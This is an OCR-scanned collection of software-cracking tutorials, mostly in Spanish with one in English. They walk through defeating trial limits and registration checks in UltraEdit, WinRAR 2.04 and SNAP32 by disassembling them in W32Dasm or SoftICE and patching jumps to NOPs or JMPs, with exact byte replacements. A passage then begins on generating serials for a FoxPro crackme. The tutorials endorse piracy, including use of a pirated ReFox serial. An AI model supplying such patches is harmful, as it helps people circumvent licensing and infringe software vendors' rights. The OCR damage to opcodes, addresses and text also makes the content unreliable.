Jajajajajaja...el programador ya se tomo la molestia de avisarnos que el programa 
EXPIRO. iii 


UltraE di 45 Day Evaluation time expired! AS 


To continue to use UltraE di you must send the regstrabion fee of $30.00 (Ohio residents 
add $1.35 tax] to: 


IDM Computer Solutions, Inc. 
lan D. Mead 


Pues bien tomémonos la molesta de CraCkearlo ...=8-P 


Como siempre antes de empezar tenemos que hacer una copia de el archivo que vamos a 
modificar..ya saben con la copia visualizamos el código con W32Dasm y al original lo 
modificamos con el Editor..que en este caso va a ser el HexWork Shop... el cual puedes 
bajar desde mi Site si es que no lo bajaste junto con el Curso ..Para evitarnos 
problemas,,,, por que si hay forma de que UltraEdit se CraCke solo ..pero es mucho rollo y 
no los quiero confundir .. =8-P Bien abrimos UltraEdit con nuestro precioso W32Dasm y en 
este caso vamos a buscar el texto de .. 

“UltraEdit 45 Day Evaluation time expired” pero momento... no metas todo ese rollo 
busquemos solamente el texto de 


expired si te fijas el primero que nos aparece es este.. 


2 URSolt W32Datm Ver 8:93 Program Dizorzembie/Debuggor A 
Disassembler Project Debug Search Goto Execute Text Functions HexData Befs Help 


:004483B8 750B jne 00448305 a] 
Ú 

:004493BA 070644000000 mov dword prr ([esi], 00000044 

:004483C0 E9ES000000 jmp 004484AD 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:004483B8 (C) 
' 


* Possible StringDara Ref from Data 0bj ->"PlayMacro" 
| 


:004483C5 628D82D4C00 push 004C8DD8 — 
:004483CA 57 push edi 

:004483CB ESEOBRO1OO call 004642B0 

:004483DO0 59 pop ecx 

:004483D1 85C0 Cast esx, enx 

5004483D3 59 pop «cx 

:004483D4 750B jne 004483El 


* Possible Heference to String Pesource 1D=00077: *Access denied" 
| 

:004493D6 C7064D000000 mov dword ptr [esi], 0000004D 

:004483DC E9CCOOODOO 3mp 004484AD 


* Heferenced by a (U)nconditional or (C)onditional Jump at Address: 
1:004483D4 (C) 
' 


* Possible StringData Ref from Data 0b3j ->"Selecrtilord” 
' 


Line:143771 Pg 2876 of 6991 FileCopia de VEDITI2EXE 


Pero esta vez hay que ser un poco más “específicos” ..a que me refiero con esto?i Pues 
muy sencillo como hay mas de un “UltraEdit 45 Day Evaluation time expired” hay que buscar 
lo que mas se acerque a ese cuadro de dialogo que nos aparece ahora que expiro ..les 
parece bien si le vamos dando F3 para ver los demás "UltraEdit 45 Day Evaluation time 
expired” Mmmm...que hay por aquí.. =8-P 


32 URASoÍft W32D am Ver 8.93 Program Dizsassembler/Debugger . . l51xj 


Disassembler Project Debug Search Goto ExecuteT 


00452070 6444 
:00452072 8D4D1O 
:004$2075 C645FCO2 
00452079 ESS5FA7TOZ0OO 


unciions HeQata Reis Help 


et É 
call 0047C0A9 ES 


push 00000044 

lea ecx, dword ptr [ebp+10] 
mov [ebp”04], 02 

call 0047C7DD 


* Possible Deference to String Resource ID*00069: mo contánue-co use VIC Lardit you must send ihe tegistrarion 


00452072 6445 
:00452080 £D4DIA 
:00452083 ES55A70200 
:00452088 6830200000 
:0045208D FF?510 
00452090 FF?S14 
00452093 $3 


| 

push 00000045 

lea ecx, dword ptr [ebp+l14] 

call 0047C7DD 

push 00002030 SS 
push [ebp+10] 

push [ebp+14] 

push ebx 


* Deference Edn ERAS y Ord: 0195h 


00452094 FF1EDCE54A00 
200452094 399F3C010000 
00452040 7407 
00452042 8B06 
00452044 SBCE 

: 00452046 FFS060 


Call dword ptr ([004A56DC) 

cap dword pur [edi+0000013C], ebx 
ye 00452049 

mov eax, duord ptr l[esi] 

moy ecx, esi 

call [eax+60] 


* Yeferenced by a (Ujmnconditional or (Cjonditional Jump at Address: 


1:00452040(C) 

| 

A E 
4 


ratt MAarsan ne 
> 


| Line-162301 Pg 3246 and 3247 ol 6991 Fie Copia de UEDITIZEXE — 


Si te fijas nos aparece el dialogo de "UltraEdit 45 Day Evaluation time expired” Pero 
también un poco mas abajo nos aparece la continuación del texto que viene en nuestra caja 
de dialogo que es..”To continue to use UltraEdit you must ..bla bla.bla..”Y no ves algo mas 
interesante x ahí?ii .. Así es tenemos un precioso USER32.MessageBoxA Ahora me captas 

la idea?ii =8-P Bien parece que ahora si estamos en el lugar correcto... Si subes un 

poquito podrás ver que a todo este meollo lo condiciona un salto 


: 00452043 399F3C010000 
300452049 OFS576FFFFFF 


cmp dword per [edi+0000013C], ebx 
¿ine 00451FC5 


* PReferenced a (U)jnconditional or (C)onditional J at Address: 


| 

:0045204F ESFBIBFBFF 
00452054 391D18F04C00 
:00452054 7584 
:0045205C 8D4D10 
:0045205F ES45100200 
00452064 8D4D14 

: 00452067 C645FCO1 
:0045206B ES3I9A00200 


call 00405C4F 

camp dword ptr [004CF018], ebx 
jne 00451PE6 

lea ecx, dword ptr [ebp+10] 
call 00470019 

lea ecx, dword ptr [ebp+14] 
mov [ebp-04], Ol 

call 0047C049 


* Possible Reference to String Resource ID=00068: "Ultrafdit 45 Day Evaluation tine expired!!!!” 


Que es la dirección 00452041 Te late si nos vamos a esa dirección? Ya sabes presionamos 


Goto /Goto CoDeLocation 


e introduces la dirección .... Nos vino a tirar aquí.. =8-P 


:00452027 ES62280300 call 00489488E 


10045202C A140F04C000 mov eax, dword ptr (004C0F040] 
:00452031 2B0548F04C00 sub esx, dword prr [004CF048) 
100452037 50 push eax 

:00452038 ESD3490100 call 00466410 

:0045203D 83F82D cmp «ax, 0000002D 

:00452040 59 op ecx 

:00452043 399F3C010000 cmp dword ptr [edi+0000013C], ebx 
: 00452049 OFSS576FFFFFF jne 00451FC5 


A cabron?ii =8-O  ..eso es un "jg” ..y eso que es.. =8-/?2i Creo q hoy de nuevo vamos a 
tener que aprender algo de ensamblador .. =8-P. Pues si recuerdas los dos saltos que 
conocemos hasta el momento =8-P Son el "je” 4 "jne” Y recuerdas que: je ( 74 en 

HexaDecimal) : Jump if Equal (salta si los dos datos a comparar son iguales) 
jne ( 75 en HexaDecimal) : Jum if Not Equal (salta si los dos datos a comparar no son 
iguales) 


Lo que sucede es que cuando un programa ..verifica la fecha, o comprueba las veces que lo h 
abierto ...o cosas x el estilo ..ya no emplea saltos de je - jne 
Si no que ya, salta directo a ó salta si esta sobre , salta si es inferior ..etc..etc.. 
En este caso es jg que significa : 


Jg (0F8F en HexaDecimal) : (Salta si es Mayor) 


Para que te des una idea ve esta tabla que saque de un tutorial de Ensamblador 


O a 
30 [nop [CNo OPeration) Sin operación] 


Al verla se que pensaras que cambiemos ese JG x un JNG ..jejeje pues nop ..que crees 
que pasa si lo cambiáramos así?i Ah pues pasa esto... 


: Vedit32 xj 


Vedit32 provocó un error en UEDITI2.EXE, 
Uedit32 se censrá 


Si continúan los problemas, 
pruebe de nuevo después de reiniciar el equipo, 


Mmmm caray que podremos hacer?ii .. pues fácil =8-P Lo queremos es que no salte 
..ósea vamos a hacer que no haga nada...Al principio de el curso te hable de 4 operaciones 
básicas en ensamblador y una de ella es nop (90 en HexaDecimal) : No Operation (Tan 


sencillo como que no ejecuta los datos) Entonces que se te ocurre?i ..=8-P 
Claro ..vamos a cambiar ese 7FOC— x un Nopear 9090 Así le estamos ordenando que no eje: 
ningún dato...Y bueno como estamos situados sobre  :00452041 7FOC jg 00452 


solo nos resta buscar el OffSet en nuestro editor que como lo mencionaba hace rato en este « 
es el HexWorkShop 
Solo tienes que modificar 7FOC x 9090 Y este va a ser nuestro resultado.. =8-P 


E) This is an unregistered copy of UltraE dit-32. 

Use of this program should be on a temporary 
basis (45 Days max] for evaluation purposes 
only. lfthis program is to be used for purposes 
other than evaluation please register this 
prograr. 


Detads for registration can be found in the 
READ. ME file and in the 'About' dialog box on 
the help menus. 


vw ulttaedk com 


You have fo days left for evaluation. 


Jejejeje..quieres saber que hicimos?i  ..Ook lo que sucede es que en el código hay 3 cosas bá 
X las cuales descubrimos el salto ...La primera y mas visible es la de USER32.MessageBoxA 
eso ya sabemos que se trata de una caja de dialogo... 
La segunda es el texto exacto de la caja de dialogo que encontramos...Y la tercera es este pe: 


del código ... 
:00452037 50 push enx 
:00452038 ESD3490100 call 00466410 


:0045203D 83F82D 
:00452040 59 


cmp «ax, 0000002D 


:00452043 399F3C010000 cmp dword ptr [edi+0000013C], ebx 
00452049 OFSS576FFFFFF jne 00451FC5S 


Si te fijas donde subraye con rojo ..significa que compare EAX con 45 días ..si ya se que ah 

dice 45 ..pero es que acuérdate que esta en hexadecimal ..y 2D en Hexadecimal es 45 en 

decimal... Y lo que hicimos en si fue evitar el salto hacia Expired ..para lo cual recurrimos 
Nopear el programa (con dos 90 ..y siempre se deben poner los que hagan falta). 


En muchos programas de 30 días utilizan : 
cmp eax, O000001E (compara EAX con 1E (30 decimal: que es igual a 30 días) jng Seguir 
(Si no es mayor, salta y Síguele) Y la solución más viable seria meter un JMP (EB) para que 
salte siempre ..en vez de que si no es mayor a 30 días salte ... Esa tabla que te di te va a 
ayudar mucho con los saltos, cuales son mejores y más favorables para cambiar... Pues 
bien cansadito?iii =8-P Y aun no se acaba el desmadre = *( Si te fijas... si ya no nos 
marca una fecha limite y ya nos dejo en “O” días Pero aun sigue esa NagScreen jodiendo. . 
=8-/ .. Mmm vale madre... Ahora que?ii Déjenme pensar... mmmm .. aaayyyyy que hueva 
tengo = -O ¡li Y mi perro que esta jode y jode que quiere leche..carajo..ahorita vengo voy a 
darle de cenar.. =8-S ...Jajajaja ya pasaron 2 horas y mientras veía la TV se me fue el 
avión... jajajajajaja Que se les ocurre que podemos hacer con esa NagScreen?i Ya se...iii 
vamos a buscar el primer texto donde dice ... "This is a unregistered copy....“Ya sabes no 
metas todo el rollo eso es cuando vas empezando si quieres solo pon Unregistered Como 
desconocemos + d referencias q tenga este texto lo mejor es irnos al principio del código 
....Eso lo puedes hacer subiéndote con la barra del lado derecho hasta arriba..O presionas 
el botón de tu teclado que dice “Inicio” Bien ya estando en el Inicio de el código ahora si 
buscamos nuestro texto 
Y el primer lugar a donde vamos a llegar es aquí ... 
Name: DialogID_006E of Controls=008, Caption:*", ClassName:"*” 


- ControlID:0080, Control Class: "STATIC" Control Text: "Details for registration can be found in the 
” ControlID:FFFF, Control Class: "STATIC" Control Text:*"* 
004 - ControlID:FFFF, Control Class: "STATIC" Control Text: "You have" 
- ControlID:0082, Control Class: "EDIT" Control Text:"" 
-= ControlID:FFFF, Control Class: "STATIC" Control Text:"days left for evaluation." 
007 - ControlID:0001, Control Class: "BUTTON" Control Text: "Enter Aurhorization code" 
008 - ControlID:FFFF, Control Class: "STATIC" Control Text: "idmBidaucomp.com, www. iducomp.com, vuvw.ultracd 


Si te fijas en toda esa parte del programa hay bloques de texto ..y lo que los separa es 
esto: 
Name: DialogID_XXX, + of Controls=XXX, Caption:”” , ClassName:”” 
Bueno donde X son los números o letras con el que cada dialogo se identifica Si te fijas esta 
el texto del cuadro de dialogo osease de la NagScreen Y nos esta dando el nombre y numero « 
dialogo que viene siendo DialogID_006E€ 
Entonces busquemos DialogID_006E Nos tira aquí ...ahora si te fijas en este pedazo del c( 
tenemos una llamada (CALL) 


* Deferenced by a CALL at Address: 
1:00451F69 


:00408488 FF742404 push [esp+04] 


* Possible Peference to Díalog: DialogID_0069, CONTROL _ID:006£E, ”* 
1 


* Possible Reference to String Resource 1D=00110: “Select directory to search.” 


Y esa llamada tiene por referencia la dirección .. 00451F69 Vamonos a esa dirección en nue: 
W32Dasm... y ahora nos va a tirar acá.. 


* Peferenced by a (U)nconditional or (C)onditional Jump at Address: 


I¿QO4SLEEALOL, 

| 

:00451F5E FF?71C push [edi+1C] 

:00451F61 28DB720010000 lea esi, dword ptr [edi+00000120] 
:00451F67 S8BCE mov ecx, esíi 

:00451F6E 85C0 test eax, eax 

:00451F70 7506 jne 00451F78 

:00451F72 899F3C010000 mov dword ptr [edi+0000013C], ebx 


En esa dirección que llegamos es la causante de que salga la NagScreen 


Bien ahora si te fijas un poco mas arriba de la dirección a donde llegamos hay una llamada 
condicional ....00451EE4 
Otra vez con nuestro W32Dasm nos vamos a esa dirección... y ahora caemos acá.. =8-0O 


A >> me A 


¡DO451ERO SB4514 mov eax, dword ptr [ebp+14] 
:00451EE3 48 dec eax 

:DO4S1EES 48 dec «ax 

:00451EE7 0FS5F9000000 jne 00451FE6 

:D0O451EED 391D18F04C00 cmp dword ptr [004CF018], ebx 
:00451EF3 OFSSDAO010000 jne 004520D3 

:D004S1EF9 S33DCOE04C0000 cmp dword pur [004CE0C0], 00000000 


:D0451F00 C70518F04C0001000000 mov dword ptr (004CF018), 00000001 


* Possible StrinoData Ref from Data 0b% ->"MousePos" 


Si te fijas llegamos a un Jump if Equal ..o bueno a un salto 74 ..jejejeje que pasaría si cambi. 
ese salto por un 75?i =8-P Jejejejejeje ...veamos el OffSet que nos da y busquémoslo en nue. 
Editor que por esta vez es el HexWork ... 
Lo modificamos...y ..nos quedo así =8-P 


lola 
1 Ele Edt Seach Project View Fomai Column Macio Advanced Wmdow Help =181x] 
DoS dSQRwWHHAaR*pPDa II O56B0S s 
Ed | 


[For Help, pre [Ln 1. Col 1 


Si te fijas en la fecha dice 2002 ..y aun así sigue funcionando el programa ..además de que c 
que lo abres ya no hay ninguna pantalla... Jejejeje..ya mas adelante después de hacer este tip 

cosas..vas a aprender a hacer tus propios CraCks ..jejejejeje y podrás igual y entrar a algu 
elite..aunque no te lo recomiendo... Luego te desconocen bola de racistas -=7-( ..iii Pero en fin 


quede en la conciencia de cada quien... Bueno como siempre cualquier duda o comentario ahí tie 
mi email...tnkx =8-P Ahhh..y se me olvidaba ..Gracias por su compra ¡- ) .. México 


D.F......1997 


09 With, 


Cracking Winrar 2.04 


http://www .creabel.com/softronic 
Tools Needed: 
W32Dasm 
Softice 
Your favorite hex-editor 


To start off open up WinRAR95.exe in W32dasm. Go to réís, then choose 
string references to look for interesting strings. Right away you'll see 
evaluation copy and registered version, but searching for those strings won't 
get you anywhere fast. So scroll down a little bit more until you get to 
string number 51, "Available in registered version only". This sounds like 
a good string to check for, so double click on it. You'll sbp in the 
following code: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00413655(C) 


:00413659 833D5857420000 cmp dword ptr [00425758], 00000000 
:00413660 7534 jne 00413696 


* Possible Reference to String Resource ID=00048: "Normal" 
:00413662 6430 push 00000030 


* Possible Reference to String Resource ID=00026: "Warning" 


:00413664 6A1A push 0000001 A 
:00413666 E84D680000 call 00419EB8 
:0041366B 59 pop ecx 

:0041366C 50 push eax 


* Possible Reference to String Resource ID=00051: "Available in registered version only" 


:0041366D 6A33 push 00000033 
:0041366F E844680000 call 00419EB8 
:00413674 59 pop ecx 

:00413675 50 push eax 
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:00413676 53 push ebx 
* Reference To: USER32.MessageBoxA, Ord:0000h 


:00413677 ESF60E0100 Call 00424572 
:0041367C 6A00 push 00000000 


* Possible Reference to Dialog: GENERALCFGDLG, CONTROL_ID:0089, "Put authenticity $zverification 
* Possible Reference to String Resource ID=00137: "Comment broken" 


:0041367E 6889000000 push 00000089 
:00413683 53 push ebx 


* Reference To: USER32.CheckDlgButton, Ord:0000h 


:00413684 E81D0E0100 Call 004244A6 
:00413689 6A00 push 00000000 


Now that's a lot of code, but look near the bottom. Notice the reference to 
authenticity verification? If you open up WinRAR, go to "Options"", then 
"Interface", then "General", you'll see a check box for put authenticity 
verification. If you try and check it though a nag box pops up with the words 
(guess) ''A vailable in registered version only". So lets look just at the nag 
box in the code above: 


:00413659 833D5857420000 cmp dword ptr [00425758], 00000000 
:00413660 7534 jne 00413696 
* Possible Reference to String Resource ID=00048: "Normal" 


:00413662 6A30 push 00000030 


* Possible Reference to String Resource ID=00026: "Warning" 


:00413664 6A1A push 0000001 A 
:00413666 E84D680000 call 00419EB8 
:0041366B 59 pop ecx 

:0041366C 50 push eax 


* Possible Reference to String Resource ID=00051: "Available in registered version only” 


:0041366D 6A33 push 00000033 
:0041366F E844680000 call 00419EB8 
:00413674 59 pop ecx 

:00413675 50 push eax 

:00413676 53 push ebx 
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* Reference To: USER32.MessageBoxA, Ord:0000h 


:00413677 ESF60E0100 Call 00424572 


See how it compares [00425758] to 0, and if its not equal (meaning its most 
likely equal to 1), it jumps over the nag box, to the code which has calls 

like CheckDIgButton which you can guess checks the box for authenticity 
verification. So now all we have to do is see when [00425758] is set to 
anything, and make sure its set to 1 instead of 0. This is another one of 
those things where [00425758] is probably a boolean variable in the author's 
source, name registered or isreg or something like that. So search through 
your listing of the program for [00425758]. You will get a ouple of false 
stops where its comparing [00425758] to something, but ignore them all until 
you reach code where its value is being altered. You will end up at this 

code: 


:0040A55C FF35F0BE4200 push dword ptr [0042BEF0] 
:0040A562 E809270100 call 0041CC70 
:0040A567 83C40C add esp, 0O00000C 
:0040A56A 85C0 test eax, eax 
:0040A56C 0F94C1 sete cl 
:0040A56F 83E101 and ecx, 00000001 
:0040A572 890D58574200 mov dword ptr [00425758], ecx 
:0040A578 FF3538574200 push dword ptr [00425738] 
:0040A57E E845870100 call 00422CC8 
:0040A583 59 pop ecx 
:0040A584 33C0 xXor eax, eax 
:0040A586 A338574200 mov dword ptr [00425738], eax 
:0040A58B A158574200 mov eax, dword ptr [00425758] 


What does that do? well lets take an in depth look at the lines where 
ecx is moved into [00425758]. 


:0040A 562 ES09270100 call 0041CC70 
A call that we can almost guarentee modifies eax (see below for importance of eax) 
:0040A567 83C40C add esp, 0000000C 


Just correcting the stack (hint: don't mess up any instructions dealing with 
esp, it will most likely screw up the program) 


:0040A56A 85C0 test eax, eax 
If eax is 0, it will set the equal flag, otherwise it won't 
:0040A56C 0F94C1 sete cl 


Set if equale cl. This means if the equal flag is set (from the previous 
test eax,eax call) the cl register (the lower part of cx a.k.a ecx) will be 
set (made equal to 1) 

:0040A56F 83E101 and ecx, 00000001 
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And the value of ecx by 1. In order to see how this effects it go to your 
start menu, click on programs, then accessories, then calculator. Goto view 
then choose scientific. Now see how the ''dec'' spot is checked? Check off 
"hex" instead. Now lets test some possible values of ecx. Lets try 0. Press 
0, then and, then 1. It is equal to 0. Now lets say ecx is equal to 1. press 
1, then and, then 1. Its now equal to 1. 

:0040A572 890D58574200 mov dword ptr [00425758], ecx 
Now the value of ecx is moved into our isreg flag. Remember if [00425758] is 
equal to 0 then we get nagged, so we want it to equal 1. 


So now that we know we want ecx to equal 1, we know ecx must already be 1 
when it is ANDed by 1. And in order for it to be 1, the testeax,eax must 

set the equal flag so the "sete cl'' will make ecx 1. What does that mean? 

It means that call 0041CC70 should make eax equal to 0 so the test eax,eax 
will set the equal flag. If this is kind of confusing look at the code one 

last time, keeping in mind we want ecx to be 1: 


0:040A562 ES09270100 call 0041CC70; needs to make eax 0 
:0040A567 83C40C add esp, 0000000C;messing with the stack 
:0040A56A 85C0 test eax, eax; if eax is 0, equal flag is set 
:0040A56C 0F94C1 sete cl; if equal flag is set, ecx is 1 
:0040A56F 83E101 and ecx, 00000001; if ecxis 1, it stays 1 
:0040A572 890D58574200 mov dword ptr [00425758], ecx; setting isreg 


So what should we do? Lets go to the location called in W32dsm, and check 


out how eax is set. So go to :0041CC70 and heres what you see: 


* Referenced by a CALL at Addresses: 
|:00409DES ,:00409E20 ,:00409E5B ,:0040A562 ,:0040AECB 
|:00417A80 ,:0041E876 


:0041CC70 55 push ebp 

:0041CC71 8BEC mov ebp, esp 

:0041CC73 53 push ebx 

:0041CC74 8B4D10 mov ecx, dword ptr [ebp+10] 
:0041CC77 8B4508 mov eax, dword ptr [ebp+08] 
:0041CC7A 8B550C mov edx, dword ptr [ebp+0C] 
:0041CC7D 85C9 test ecx, ecx 

:0041CC7F 751A jne 0041CC9B 

:0041CC81 33C0 Xor eax, eax 

:0041CC83 5B pop ebx 

:0041CC84 5D pop ebp 

:0041CC85 C3 fet 
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There we go, now the program is cracked. See how its called many times? That 
means this is most likely the main registration procedure. See the 
xor eax,eax on line :0041cc81? That will make eax equal to 0, exactly what we 
want. But there is that ¡ne 0041cc9b right before it. Well if we never jump 
then eax will always be xor'ed by itself (any time you XOR a number by itself 
it will equal 0) so lets just get rid of that jump. So simply changing the 
bytes '"751A" to "9090" (two NOPs), will crack this program. So open up 
WinRAR95.exe in your hex editor and search and replace the following bytes: 
SEARCH: 85C9751A33C0 
REPLACE: 85C9909033C0 
We have to include those extra bytes so we don't replace the wrong 751A in the 
exe file. Now save WinRAR095.exe and start it up. What the hell it says its 
still an evaluation copy! Well a lot of program wont execute the registration 
procedure unless there is something for where it stores your name and reg 
number. In some kind of pseudo code it might look like this: 
temp=GetRegName 
temp2=GetRegNum 
if temp = 0 then goto bad 
if temp2 = 0 then goto bad 
isreg = checkKNameandNum(temp,temp2) 


goto end 
bad: 

isreg = false 
end: 


Get it? Well lets make sure there is some info in where it tores our reg 

name and number. Well it stores its settings in rar.ini in is directory, but 

instead of manually adding our name lets have the program do it for us. Start 
WinRAR, go to "Options", then choose "Registration". Enter whatever you want 
for your name and reg number, then click Ok. It thanks you for registering 

and all that crap. Now close the program and restart it. It worked! its 

registered. How did I know that it would let us register with any name and 

num? well remember all the times the reg procedure we cracked was called? I 
took a guess and assumes the Reg part of the program used that procedure too. 
So there we go, WinRAR is cracked. 


Written by : +Vip-Vop 
Published by: Splatter Industries,Inc. 


The End 


HOLA chicos, hoy crackearemos el SNAP32, y para hacer eso, necesitarás el 
Debugger Soft Ice - 3.01. 


Instala el programa, y ve a help --> Register. Ahora escribe cualquier número, 
como 6666, pero no aprietes OK. Con Control + D ve al debugger. 

Ahora, tenemos que poner el breakpoint correcto, para que podamos atrapar la 
función concreta del programa y ejecutarlo paso a paso en el debugger, 
apretando, F10. Teclea este comando en la línea del debugger: 


:hwnd snap32 y entonces aprieta Enter. El debugger contestará así: 


Window handle hQueue SZ  QOwner Class name Window Procedure 
820(1) 0D57 32 snap32  +32770(Dialog)  1497:00000770 
820(2) 57 32  snap32 Button 17D7:0000102E 


082C 0D57 32  snap32 Edit 17C7:00000BF4 


Tus números, serán diferentes. Al primer Edit, en Class Name, ponemos nuestro 
breakpoint: 
:bmsg 082C wm_gettext y entonces, aprieta Enter. 


Con :bl tenemos una relación de todos los breakpoint que pusimos. 
Con :bd 0 descargamos el breakpoint 0. 
Con :bc 0 quitamos el breakpoint 0. 


Aprieta F5 para retroceder, y entonces, OK. 

Si has puesto el breakpoint correctamente, entrarás el debugger 
automáticamente. Apretando F12, te encontrarás en el programa, después de 
que pasa los Módulos de Windows 95 User y Kernel32, y te encontrarás este 
código: 


014F:402929 LEA EAX,[EBP-34] 


014F:402937 EAX,[EBP-14] 
014F:402930 EAX 


:40293B 402752 
:402940 ESP.04 
:402943 EAX.ESI 


:402945 JZ 40295E 


:40294C PUSH 439E38 


Mientras estás en la dirección 402929, si escribes en la línea de comandos 

:D EBP-34 observarás en lugar de datos, el código que escribiste. En el lugar de 
los Registros verás SS:0067FA9C=00363636. Tendrás el mismo resultado, si 
escribes: D 67FA9C. 

Si en lugar de los Registros de datos no apareciera el código máquina, ellos 
aparecerán escribiendo estos comandos R, DATA, CODE ON y Enter después de 
cada comando. 


En la dirección 402943 esta la comparación de los valores de registros EAX y 
ESL 

: ? ESIS6666 y :? EAX=xxxxxxxxx el código verdadero que depende del registro 
EBP-14 nombre, de la dirección 402937. Si los códigos difieren, él ordena a la 
dirección 402945 continuar y si no, va a la dirección 0040295E. Si modificases el 
comando JZ (7417) A JNZ (7517), el programa aceptaría cualquier código como 
correcto, excepto el real. Con JMP(EB17) acepta todos. OK esto es. 


PERO no esperes ver siempre el comando CMP. La comparación, puede hacerse 
con una combinación de órdenes, como LEA, PUSH, TEST, CALL, SUB, JNZ. 
Y puede ponerse, detrás del comando CALL, o SUB, o con la resta de dos 
valores, o dos registros. Si el resultado es 0, eso es bueno, pero si no lo es, tendrás 
que HACERLO. También, el simplemente necesitará conseguirlo a través de la 
orden XOR EAX, EAX con un salto condicional que estará antes de la orden, y 

el catálogo, es largo. 


Bien, espero que no lo encontrases difícil, pero lo disfrutarás. 
Puedes encontrarme en ICQ: 24530541, o enviarme un e-mail a 
ia_sonO hotmail.com 


Wolf 


Traducido por Txeli de Tutorial Letal 


PRESENTAN 


TUTORIAL SOBRE 


Crackme v 1.0 Blasito 


por 


tutorial número :p Ya ni me acuerdo 


Información 


Programa: Crackme v 1.0 de Blasito 
Tamaño: 4.0 mb Grandísimo ,mas adelante les digo por que es grandisimo heheheh ;p 
URL: http://www.hackemate.com.ar/cracking 


1. Generar un Numero de Serie 
2. Codificación del Keygen. 


1. Refox v 8.0 
Herramientas: 


pS ss NewBie esocreoyo....:)D| eso creo yo ....: 


Introducción 


Bueno amigos, después de tanto tiempo de no escribir tutoriales, me animo a escribir este ya que en todo lo que llevo en el ambiente, no eh visto ningún tutorial donde se hable de 
crackear Aplicaciones hechas en Visual Fox Pro v 5.0 o v 6.0 o anteriores, así que metámosle mano a esa tool llamada REFOX v 8.0 y al crackme de mi amigo Blasito. 


Comentario del Programa 


como ya lo hemos dicho el crackme esta hecho en Visual Fox Pro y pesa mas de 4.0 megas, pufffff muchísimo, y por que pesa tanto bueno por la simple y sencilla razón de que 
Visual fox pro es un Lenguaje de programación parecido a Visual Basic y por consiguiente de la misma empresa ;p, ya saben de que empresa hablo heheheh Microsoft, lo que para 
visual basic es: vb5.dll, para fox pro se usa la dll Vfp500.dll que es de 3.5 megas uffffff, ya ni la friegan, pero dejemos esto y ya en próximos tutoriales les pondré el análisis de 
como trabaja las librerías de Visual Fox Pro. 


Manos a la Obra 


bueno amigos entremosle al toro por los cuernos, les voy a explicar en forma rápida como crackearlo en menos de 2 minutos. 


instalemos el refox v 8.0, si no lo tienen búsquenlo por ahí que ya anda en circulación con todo y su serial hehehe ;p, recuerden algo muy importante 
tengan muy a la mano el serial del REFOX v 8.0 ya que al momento de finalizar la instalación te pide el serial, si no le ponen ningún serial se activara en 
modo demo y solo les presentara las primeras 25 líneas del código y además ya no te pide el serial hasta que lo vuelvas a instalar, una ves hecho eso 
vamos y abrimos el crackme y nos muestra la siguiente ventana por cierto muy grande que tapa todo el monitor ;p, y vemos en la sección de menús tres 
opciones : Registrar - Acerca de - Salir, ahora le damos en Registrar y nos aparece una bonita ventanita con la banderita del país de donde es el autor del 
crackme: 


> CrackMe 1.0 


Nombre [profesorx 
Serial [123456780 


Aceptar | Cancelar | 


en el cual como pueden ver puse mi nick y un numero cualquiera, bueno de ahí le damos click en Aceptar para ver como reacciona y como podemos ver 
manda una imagen muy provocativa de una mujer de la vida galante hehehehe ;p. 


Jejeje este es tu regalito! 


y después de unos 5 segundos mas o menos desaparece, bueno el siguiente paso será ejecutar el REFOX y nos aparece una linda ventanita como esta: 


BoPar ver. 8.4 


Binion] E Ls | aC REFONE MEDAL ips 
damos click sobre ella y nos aparece el árbol de nuestro directorio, de ahí damos click en la parte donde esta 1.. 


Ass 


command 
ar da 
config 
del lag 
Prirdaa 
a 
moscas 
aca 

ae lag 
seed ie 
se top) ag 
sella 
smbid daga 
ss doa 


AMA at ll 


Binva| 2D A] act lied BREFOXE Puta AAA 


para subir en el orden de los directorios de nuestro disco duro y buscamos la carpeta donde se instalo el crackme y seleccionamos con doble click el 
archivo llamado crackme.exe 


Lis 
YES 


crackme sct 
foxuser dbf 
foxuser fpt 
mscreate dir 
setup stf 


y nos aparecerán todos los files que están compilados dentro del crackme.exe: 


EAT 


PA EN 


y empezamos a dar doble click sobre cada archivo en busca de los strings que aparecen en la caja de registro y una ves en el file llamado crackme.sct 
damos doble click y bajamos unas líneas y podemos ver esto: 


Name = "CRACKME" 

textbox textbox Text1 CRACKME “Height = 26 
InputMask = "XXXXXXXXXXXXXXXXXXXX" <------ AQUI SE PONE LA CANTIDAD DE ESPACIOS QUE SOPORTARA PARA EL NOMBRE 
Left = 72 

Tablndex = 1 

ToolTipText = "Escriba su nombre" 

Top = 4 

Width = 162 

Name = "Text1" 

label label Label? CRACKME tCaption = "Nombre" 
Height = 13 

Left = 8 

Top =8 

Width = 47 

Tabindex = 3 

ForeColor = 0,0,255 

Name = "Label?" 

label label Label2 CRACKME uCaption = "Serial" <-- EL STRING "SERIAL" HEHEHE NOS VAMOS ACERCANDO 
Height = 13 

Left = 8 

Top = 41 

Width = 35 

Tablndex = 4 

ForeColor = 0,0,255 

Name = "Label?" 

commandbutton commandbutton Command1 CRACKME dTop = 73 
Left = 26 

Height = 30 

Width = 86 

Caption = "Aceptar" 

Tablndex = 5 

Name = "Command1" 


PAREMOS AQUÍ HAY ALGO MUY INTERESANTE QUE SERÁ ¡P, HEHEHE CIERTO EL PROCEDIMIENTO DONDE SE VERIFICA EL SERIAL UFFFFF CREO QUE LE PEGAMOS AL TORO POR LA 
CABEZA HEHEHEHEHE. DE AQUÍ EN ADELANTE SE VE CLARÍSIMO COMO SE VERIFICA EL SERIAL, PERO QUIEREN QUE SE LOS EXPLIQUE, BUENO PUES AHI LES VA, les explicare línea por 
línea, para algunos no creo que les haga falta ya que son muy truchas e inteligentes y no necesitan la explicación, pero para los que son mas lentos como yo ahí les va. 


fPROCEDURE Valid <-- inicio de procedimiento de validación 


L1NOM=ASC(SUBSTR(crackme.text1.text,1,1)) <--pone en la variable L1NOM el valor ascli de la PRIMERA letra del name introducido en mi caso si es profesor x seria p= 112 
L2NOM=ASC(SUBSTR(crackme.text1.text,3,1)) <--pone en la variable L2NOM el valor ascli de la TERCERA letra del name introducido en mi caso si es profesor x seria o= 111 
L3NOM=ASC(SUBSTR(crackme.text1.text,5,1)) <--pone en la variable L3NOM el valor ascli de la QUINTA letra del name introducido en mi caso si es profesor x seria e= 101 
L4NOM=ASC(SUBSTR(crackme.text1.text,8,1)) <--pone en la variable L4NOM el valor ascli de la OCTAVA letra del name introducido en mi caso si es profesor x seria r= 114 
